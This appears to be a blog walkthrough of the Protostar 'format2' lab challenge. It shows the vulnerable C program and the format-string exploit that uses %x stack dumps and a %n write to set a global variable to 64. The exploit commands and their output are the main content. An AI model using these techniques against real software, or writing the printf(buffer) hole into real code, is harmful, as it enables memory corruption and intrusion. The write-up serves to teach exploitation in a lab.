#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int target; void vuln() { char buffer[512]; fgets(buffer, sizeof(buffer), stdin); printf(buffer); if(target == 64) { printf("you have modified the target :)\n"); } else { printf("target is %d :(\n", target); } } int main(int argc, char **argv) { vuln(); }This challenge seems very similar to Format 1, in all but 2 ways:
- The input is done via a fgets() instead of from the program arguments.
- Instead of allowing just any change, it specifically requires "target" to be equal to "64".
user@protostar:/opt/protostar/bin$ echo `perl -e 'print "AAAAAAAA" . "%x."x150'` | ./format2 AAAAAAAA200.b7fd8420.bffff624.41414141.41414141.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.a2e78.b7eada75.b7fd7ff4.80496b0.bffff7c8.8048338.b7ff1040.80496b0.bffff7f8.80484f9.b7fd8304.b7fd7ff4.80484e0.bffff7f8.b7ec6365.b7ff1040.bffff7f8.80484c6.80484e0.0.bffff878.b7eadc76.1.bffff8a4.bffff8ac.b7fe1848.bffff860.ffffffff.b7ffeff4.8048285.1.bffff860.b7ff0626. target is 0 :(This time, however, it seemed MUCH quicker to get the "41414141", only 4 words. Let's verify:
user@protostar:/opt/protostar/bin$ ./format2 AAAA%x%x%x%x AAAA200b7fd8420bffff62441414141 target is 0 :(So we're getting to a pretty good point, let's go ahead and find the memory address for "target":
user@protostar:/opt/protostar/bin$ objdump -t format2 | grep target 080496e4 g O .bss 00000004 targetNext, let's put that address in, replacing the "AAAA":
user@protostar:/opt/protostar/bin$ echo `perl -e 'print "\xe4\x96\x04\x08%x%x%x%x"'` | ./format2 200b7fd8420bffff62480496e4 target is 0 :(The address seems to be the last word, without any problems. So if we convert the last "%x" to "%n", it should overwrite that address in memory with the count of characters printed:
user@protostar:/opt/protostar/bin$ echo `perl -e 'print "\xe4\x96\x04\x08%x%x%x%n"'` | ./format2 200b7fd8420bffff624 target is 23 :(Unfortunately, only 23 characters were written. We can increase that number artificially by just changing the format string from "%x" to "%44x". This pads the string to be 44 characters long:
user@protostar:/opt/protostar/bin$ echo `perl -e 'print "\xe4\x96\x04\x08%44x%x%x%n"'` | ./format2 200b7fd8420bffff624 you have modified the target :)That's pretty much how it's done.
And again, as bonus, if you want to use Direct Argument Access, you can simply do:
user@protostar:/opt/protostar/bin$ echo `perl -e 'print "\xe4\x96\x04\x08%7\\\$60x%4\\\$n"'` | ./format2 a6e24 you have modified the target :)
No comments:
Post a Comment